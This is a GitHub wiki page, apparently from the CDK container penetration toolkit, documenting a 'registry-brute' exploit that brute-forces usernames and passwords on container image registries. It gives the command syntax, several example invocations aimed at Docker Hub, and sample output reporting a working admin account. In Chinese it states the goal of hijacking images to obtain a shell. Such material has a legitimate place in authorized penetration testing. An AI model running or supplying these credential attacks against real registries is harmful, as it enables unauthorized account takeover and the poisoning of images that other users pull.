-
Notifications
You must be signed in to change notification settings - Fork 551
Exploit: Container Image Registry Brute
neargle edited this page Jun 27, 2021
·
1 revision
To container image registry, brute force the accounts and passwords cracking.
暴力破解容器镜像源的账号和密码,获取一个可用的账户,用于劫持镜像获取Shell。
./cdk registry-brute <registry-url> <username|file> <password|file>.
用户名和密码的参数,可以指定文件,单个用户名,单个密码和多个密码组合。
例如:
./cdk registry-brute <registry-url> <username|file> <password|file>
./cdk registry-brute https://index.docker.io/ root,admin /tmp/passwordfile
./cdk registry-brute https://index.docker.io/ admin admin
./cdk registry-brute https://index.docker.io/ /tmp/usernamefile /tmp/passwordfile
Output:
➜ CDK git:(main) ✗ ./cdk run registry-brute http://docker.xxxxx admin /tmp/password-list
2021/06/27 11:57:20 user dict length: 1.
2021/06/27 11:57:20 password dict length: 108.
2021/06/27 11:57:23 Account: admin:xxxxxxx is available.
2021/06/27 11:57:23 End!